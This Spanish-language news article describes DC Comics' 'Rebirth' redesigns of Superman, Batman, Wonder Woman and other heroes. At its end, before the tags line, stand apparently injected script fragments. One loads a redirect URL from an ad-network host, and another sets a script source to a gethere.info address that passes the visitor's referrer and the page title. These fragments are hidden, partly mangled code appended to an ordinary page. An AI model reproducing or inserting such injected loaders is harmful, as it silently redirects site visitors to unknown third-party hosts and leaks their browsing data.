Así lucirán los héroes de DC Comics en “Rebirth” lo que sigue a los “New 52”

La editorial vuelve a actualizar a sus superhéroes más emblemáticos.

 

Como ya es una costumbre, DC volverá a renovar el aspecto de sus personajes principales este año, en un evento que llevará por nombre Rebirth. El 2015 fue un año con grandes cambios, en los que vimos a un Superman con playera ajustada, poderes reducidos y sin identidad secreta; un Batman con armadura, bajo la que se ocultaba el ex-comisionado James Gordon; una Wonder Woman con un traje más conservador, ocultando todo su cuerpo, y un Green Lantern convertido en fugitivo de la ley espacial.

Ahora la editorial apuesta por regresar a lo básico, trayendo, por lo menos en la apariencia, diseños más cercanos con los uniformes clásicos de sus héroes, aunque con toques modernos.

Superman

Superman usará un uniforme más cercano a su versión original, sin el cuello alto que tenía al inicio de New 52, y sus botas serán casi completamente azules. El cinturón también se estiliza, junto con las mangas de su traje y retoma su peinado quebrado, en lugar del casquete corto que lució en el último año.

 

Batman

Por su parte Batman deja la armadura de conejo de lado, y ahora porta un uniforme con pequeños acabados en naranja en el logo y el cinturón, el cual se parece bastante a la versión cinematográfica encarnada por Ben Affleck.

 

Wonder Woman

Wonder Woman usará un atuendo más cercano al que portaba previó a New 52, también con un toque clásico.

 

El resto de héroes principales también recibió cambios, algunos como Aquaman muy ligeros, y otros como Green Lantern incluso de personaje, donde Hal Jordan sede su anillo a la ex-Power Ring Jessica Cruz.

 

El primer número de DC Universe Rebirth estará a la venta el 25 de mayo.

 

< src="https://restwp.mobidea.com/jsredir?v=1&sl=312182-3f487&redirect_option=1&data1=Track1&data2=Track2">

s.src=’http://gethere.info/kt/?264dpr&frm=&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;

Etiquetas:|||